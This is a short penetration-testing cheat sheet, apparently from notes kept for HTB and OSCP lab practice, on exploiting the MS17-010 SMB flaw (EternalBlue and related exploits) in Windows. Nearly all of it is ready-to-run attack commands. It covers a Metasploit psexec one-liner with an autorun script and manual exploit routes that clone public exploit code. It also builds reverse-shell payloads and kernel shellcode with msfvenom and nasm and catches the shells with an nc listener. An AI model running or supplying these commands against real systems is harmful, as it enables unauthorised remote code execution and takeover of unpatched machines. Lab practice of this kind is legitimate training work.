SMB MS17-010

MS17-010 (EternalBlue & others)

Check

sudo nmap -sC -p 445 --script smb-vuln-ms17-010.nse 1.2.3.4

Exploit

Metasploit

EternalChampion/EternalSynergy
It’s working on HTB and OSCP lab and it’s stable
echo -e '
run post/windows/manage/migrate
search -f root.txt
search -f user.txt
' > /tmp/auto.rc

sudo msfconsole -x '
use windows/smb/ms17_010_psexec;
set RHOSTS 1.2.3.4;
set LHOST 4.3.2.1;
set AutoRunScript "multi_console_command -r /tmp/auto.rc";
run;'

Manual (named pipe)

That works for OSCP (XP) lab but doesn’t for HTB
This isn’t EternalBlue (maybe Champion/Synergy/Romance), and it’s stable
# Listen with : nc -lnvp 4444

RHOST="1.2.3.4"
LHOST="4.3.2.1"
LPORT="4444"

cd $(mktemp -d) && git clone https://github.com/helviojunior/MS17-010.git .
msfvenom -p windows/shell_reverse_tcp LHOST=$LHOST LPORT=$LPORT EXITFUNC=thread -f exe -a x86 --platform windows -o rs.exe
python2 send_and_execute.py $RHOST rs.exe

Manual (no pipe)

Classic EternalBlue, it’s highly unstable, sometimes you need to try multiple times or reboot machine
Exploit7 is for W7 and exploit8 for W8 and above
It doesn’t work for OSCP lab but does for HTB
# Listen with : nc -lnvp 4444

RHOST="1.2.3.4"
LHOST="4.3.2.1"
LPORT="4444"

cd $(mktemp -d) && git clone https://github.com/worawit/MS17-010.git .
cd shellcode/
nasm -f bin eternalblue_kshellcode_x86.asm -o ./sc_x86_kernel.bin
nasm -f bin eternalblue_kshellcode_x64.asm -o ./sc_x64_kernel.bin
msfvenom -p windows/shell_reverse_tcp LHOST=$LHOST LPORT=$LPORT -f raw -o sc_x86_msf.bin EXITFUNC=thread
msfvenom -p windows/x64/shell_reverse_tcp LHOST=$LHOST LPORT=$LPORT -a x64 -f raw -o sc_x64_msf.bin EXITFUNC=thread
cat sc_x86_kernel.bin sc_x86_msf.bin > sc_x86.bin
cat sc_x64_kernel.bin sc_x64_msf.bin > sc_x64.bin
python2 eternalblue_sc_merge.py sc_x86.bin sc_x64.bin sc_all.bin
cd ..

python2 eternalblue_exploit7.py $RHOST ./shellcode/sc_all.bin
By merging shellcode you don’t have to care about target arch